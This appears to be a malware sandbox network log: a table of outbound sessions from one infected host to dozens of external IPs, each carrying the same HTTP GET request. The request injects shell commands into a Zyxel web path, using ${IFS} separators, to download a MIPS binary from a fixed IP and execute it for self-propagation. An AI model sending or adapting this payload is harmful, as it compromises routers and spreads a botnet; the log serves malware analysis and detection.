                                                Jan 28, 2024 10:16:23.782197952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3970192.168.2.2340868165.45.24.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.782212019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3971192.168.2.234147894.56.172.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.782238007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3972192.168.2.2333198205.128.98.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.782250881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3973192.168.2.2359060108.150.198.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.782291889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3974192.168.2.234790036.3.235.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.782319069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3975192.168.2.233904457.93.137.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.782365084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3976192.168.2.235728019.143.72.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.782391071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3977192.168.2.234324295.204.25.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.782407999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3978192.168.2.2339604137.59.122.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.782428980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3979192.168.2.2357058197.141.42.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.782459021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3980192.168.2.2352284131.28.110.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.782469988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3981192.168.2.2340522204.209.234.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.782506943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3982192.168.2.235496045.185.2.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.782506943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3983192.168.2.2354568162.12.50.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.782553911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3984192.168.2.2343658189.92.29.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.782567024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3985192.168.2.234976625.119.227.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.782613993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3986192.168.2.2344532149.219.151.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.782643080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3987192.168.2.2348732163.37.23.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.782664061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3988192.168.2.2345716145.119.22.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.782686949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3989192.168.2.2333960208.191.103.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.782702923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3990192.168.2.2345082184.189.242.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.782712936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3991192.168.2.2344052188.176.213.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.782753944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3992192.168.2.2349324113.207.72.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.782794952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3993192.168.2.234421040.165.39.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.782824993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3994192.168.2.235060072.108.228.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.782857895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3995192.168.2.2333538188.218.149.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.782875061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3996192.168.2.2341810110.134.107.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.782891989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3997192.168.2.235501867.254.15.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.782916069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3998192.168.2.233700838.85.21.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.782955885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3999192.168.2.23432804.23.208.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.782983065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4000192.168.2.2334706192.242.47.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.782991886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4001192.168.2.2353900204.67.133.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783015013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4002192.168.2.2332984122.133.227.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783054113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4003192.168.2.235893672.26.113.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783066988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4004192.168.2.235226287.144.174.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783113956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4005192.168.2.2356704171.147.234.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783123016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4006192.168.2.2352024165.128.133.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783150911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4007192.168.2.2335348206.54.38.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783195972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4008192.168.2.2345322175.77.43.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783219099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4009192.168.2.2355954220.9.35.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783235073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4010192.168.2.23388549.222.205.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783252001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4011192.168.2.233901276.233.110.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783296108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4012192.168.2.2333268176.33.251.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783320904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4013192.168.2.2343334112.159.217.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783354044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4014192.168.2.235286893.170.135.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783371925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4015192.168.2.234553662.175.199.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783395052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4016192.168.2.2352984158.24.112.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783438921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4017192.168.2.234374269.74.95.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783461094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4018192.168.2.235377878.3.220.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783509970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4019192.168.2.235830486.51.73.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783535004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4020192.168.2.23458382.216.175.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783543110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4021192.168.2.2336922140.245.184.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783575058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4022192.168.2.236087489.5.149.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783607960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4023192.168.2.234427464.245.201.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783617973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4024192.168.2.235485636.180.173.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783638954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4025192.168.2.2359474168.48.231.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783649921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4026192.168.2.2337676118.248.98.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783670902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4027192.168.2.2346140222.177.231.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783680916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4028192.168.2.2360928202.19.13.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783700943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4029192.168.2.233586841.189.253.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783720016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4030192.168.2.2340606165.154.120.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783720016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4031192.168.2.2336990152.151.85.93443
                                                TimestampBytes transferredDirectionData
